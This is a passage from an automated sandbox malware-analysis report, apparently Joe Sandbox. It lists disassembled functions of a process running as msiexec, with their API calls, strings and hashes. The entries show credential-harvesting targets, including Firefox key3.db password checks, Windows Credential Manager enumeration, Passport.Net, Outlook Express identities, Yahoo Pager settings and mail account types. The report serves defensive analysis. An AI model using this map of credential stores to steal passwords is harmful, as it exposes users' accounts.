                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 577244452-0
                                                                                                      • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                      • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                      • String ID: imap$pop3$smtp
                                                                                                      • API String ID: 2025310588-821077329
                                                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1786725549-0
                                                                                                      • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                      • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: global-salt$password-check
                                                                                                      • API String ID: 231171946-3927197501
                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                      • Opcode Fuzzy Hash: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 19018683-0
                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2142929671-0
                                                                                                      • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                      • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                      • String ID: Passport.Net\*
                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                      • String ID: Personalities
                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      • API String ID: 3510742995-272990098
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: H
                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                      • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      • API String ID: 231171946-3708268960
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                      • API String ID: 438689982-3457389245
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: winRead
                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset
                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID$`{/h
                                                                                                      • API String ID: 3363972335-889311285
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2374668499-0
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2241099983-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2775283111-0
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                      • API String ID: 885266447-2471937615
                                                                                                      APIs
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                      • CloseHandle.KERNEL32(?,?,00406C55,00000000,?,00000000,?), ref: 00406B11
                                                                                                        • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                        • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407917
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
